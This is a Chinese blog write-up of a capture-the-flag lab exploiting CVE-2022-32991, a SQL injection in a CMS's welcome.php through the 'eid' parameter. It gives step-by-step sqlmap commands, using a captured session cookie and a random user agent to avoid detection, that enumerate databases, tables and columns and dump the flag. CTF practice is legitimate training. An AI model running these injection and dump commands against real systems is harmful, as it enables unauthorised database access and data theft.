春秋云境 CVE-2022-32991

参考博客:【春秋云境】CVE-2022-32991靶场wp-CSDN博客

一开始题目就提示了该CMS的welcome.php中存在SQL注入攻击

打开环境,直接尝试进入welcome.php,发现跳转到了login.php,那我们还是注册登录看看

 注册、登录后才看到就在welcome.php页面下

在阿里云漏洞库(阿里云漏洞库)里可以看到漏洞的具体实现参数是eid

随便点击了第一个star就发现了eid参数

 

 来抓包搞一下,保存成1.txt直接用sqlmap一把梭

先查数据库名

sqlmap -r 1.txt --dbs --batch --random-agent -p eid

--user-agent可采用--random-agent

这里参考大佬的说明:由于该页面采用了登录访问,所以首先想到要使用–cookie参数使得sqlmap绕过身份验证,并添加–user-agent参数或--random-agent使得sqlmap绕过客户端验证,否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断。

不抓包保存成文档也可以这种语句:
sqlmap -u "http://eci-2ze7w48823u3nvrxmne4.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --random-agent --cookie="PHPSESSID=cl3ho5qn9f68jr8eias8j0ktai" --batch --dbs

看到有个ctf的库,继续爆表(打着打着环境没了,还以为语句错了搞了好久,,提醒大家一定注意下环境时间)

sqlmap -r 1.txt --random-agent -p eid -D "ctf" --tables --batch

 

可以看到一个flag的表,进去看看

sqlmap -r 1.txt --random-agent -p eid -D "ctf" -T "flag" --columns --batch

看到有个flag的字段,直接获取里面的内容,得到flag

sqlmap -r 1.txt --random-agent -p eid -D "ctf" -T "flag" -C "flag" --dump --batch

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值